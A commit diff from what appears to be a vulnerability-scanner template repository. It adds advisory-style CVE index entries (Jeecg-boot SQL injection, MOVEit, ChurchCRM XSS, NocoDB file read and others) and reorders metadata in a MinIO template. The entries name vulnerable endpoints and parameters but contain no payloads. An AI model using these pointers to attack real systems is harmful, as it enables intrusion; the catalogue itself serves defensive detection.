attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0942.yaml"} @@ -1789,9 +1797,13 @@ {"ID":"CVE-2023-1177","Info":{"Name":"Mlflow \u003c2.2.1 - Local File Inclusion","Severity":"critical","Description":"Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1177.yaml"} {"ID":"CVE-2023-1362","Info":{"Name":"unilogies/bumsys \u003c v2.0.2 - Clickjacking","Severity":"medium","Description":"This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1362.yaml"} {"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"} +{"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"} +{"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"} {"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} +{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} +{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} @@ -1807,26 +1819,32 @@ {"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"} {"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"} {"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"} +{"ID":"CVE-2023-24488","Info":{"Name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","Severity":"medium","Description":"Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24488.yaml"} {"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"} {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} +{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"critical","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} +{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"} +{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} {"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"medium","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"} {"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"critical","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"} {"ID":"CVE-2023-27292","Info":{"Name":"OpenCATS - Open Redirect","Severity":"medium","Description":"OpenCATS contains an open redirect vulnerability due to improper validation of user-supplied GET parameters. This, in turn, exposes OpenCATS to possible template injection and obtaining sensitive information, modifying data, and/or executing unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-27292.yaml"} {"ID":"CVE-2023-2732","Info":{"Name":"MStore API \u003c= 3.9.2 - Authentication Bypass","Severity":"critical","Description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2732.yaml"} {"ID":"CVE-2023-27350","Info":{"Name":"PaperCut - Unauthenticated Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27350.yaml"} +{"ID":"CVE-2023-27372","Info":{"Name":"SPIP - Remote Command Execution","Severity":"critical","Description":"SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27372.yaml"} {"ID":"CVE-2023-27482","Info":{"Name":"Home Assistant Supervisor - Authentication Bypass","Severity":"critical","Description":"Home Assistant Supervisor is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered.This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2023/CVE-2023-27482.yaml"} {"ID":"CVE-2023-27524","Info":{"Name":"Apache Superset - Authentication Bypass","Severity":"high","Description":"Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-27524.yaml"} {"ID":"CVE-2023-27587","Info":{"Name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","Severity":"medium","Description":"ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-27587.yaml"} {"ID":"CVE-2023-2780","Info":{"Name":"Mlflow \u003c2.3.1 - Local File Inclusion Bypass","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2780.yaml"} +{"ID":"CVE-2023-28121","Info":{"Name":"WooCommerce Payments - Unauthorized Admin Access","Severity":"critical","Description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28121.yaml"} {"ID":"CVE-2023-2825","Info":{"Name":"GitLab 16.0.0 - Path Traversal","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2825.yaml"} {"ID":"CVE-2023-28343","Info":{"Name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","Severity":"critical","Description":"Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28343.yaml"} {"ID":"CVE-2023-28432","Info":{"Name":"MinIO Cluster Deployment - Information Disclosure","Severity":"high","Description":"MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-28432.yaml"} @@ -1838,10 +1856,22 @@ {"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} {"ID":"CVE-2023-29923","Info":{"Name":"PowerJob \u003c=4.3.2 - Unauthenticated Access","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29923.yaml"} +{"ID":"CVE-2023-30019","Info":{"Name":"Imgproxy \u003c= 3.14.0 - Server-side request forgery (SSRF)","Severity":"medium","Description":"imgproxy \u003c=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30019.yaml"} {"ID":"CVE-2023-30210","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30210.yaml"} {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} +{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} {"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"medium","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"} {"ID":"CVE-2023-32243","Info":{"Name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","Severity":"critical","Description":"Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-32243.yaml"} {"ID":"CVE-2023-32315","Info":{"Name":"Openfire Administration Console - Authentication Bypass","Severity":"high","Description":"Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-32315.yaml"} +{"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} +{"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} +{"ID":"CVE-2023-34362","Info":{"Name":"MOVEit Transfer - Remote Code Execution","Severity":"critical","Description":"In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34362.yaml"} +{"ID":"CVE-2023-34537","Info":{"Name":"Hoteldruid 3.0.5 - Cross-Site Scripting","Severity":"medium","Description":"A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-34537.yaml"} +{"ID":"CVE-2023-34598","Info":{"Name":"Gibbon v25.0.0 - Local File Inclusion","Severity":"high","Description":"Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34598.yaml"} +{"ID":"CVE-2023-34599","Info":{"Name":"Gibbon v25.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34599.yaml"} +{"ID":"CVE-2023-34659","Info":{"Name":"JeecgBoot 3.5.0 - SQL Injection","Severity":"critical","Description":"jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34659.yaml"} +{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"high","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} +{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} +{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index feec14ad6c..682df38b16 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -6a8d52a6e0f4ae54ace3ababe34a2385 +b830e8b5ef413ec8d972848bd93b95d8 From ff1fcc773558e41140f05ccb54811841608a7eaf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 15:11:55 +0530 Subject: [PATCH 351/609] Update CVE-2023-28432.yaml --- http/cves/2023/CVE-2023-28432.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 07489056e7..160cc412f5 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -6,13 +6,13 @@ info: severity: high description: | MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. + remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - https://github.com/minio/minio/pull/16853/files - https://github.com/golang/vulndb/issues/1667 - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 - remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -22,9 +22,9 @@ info: epss-score: 0.01489 metadata: max-request: 1 + verified: true fofa-query: app="Minio" shodan-query: title:"Minio Console" - verified: true tags: cve,cve2023,minio,console,exposure,kev http: From 10c437820c79b05f7f752980a1cb0927c39020e8 Mon Sep 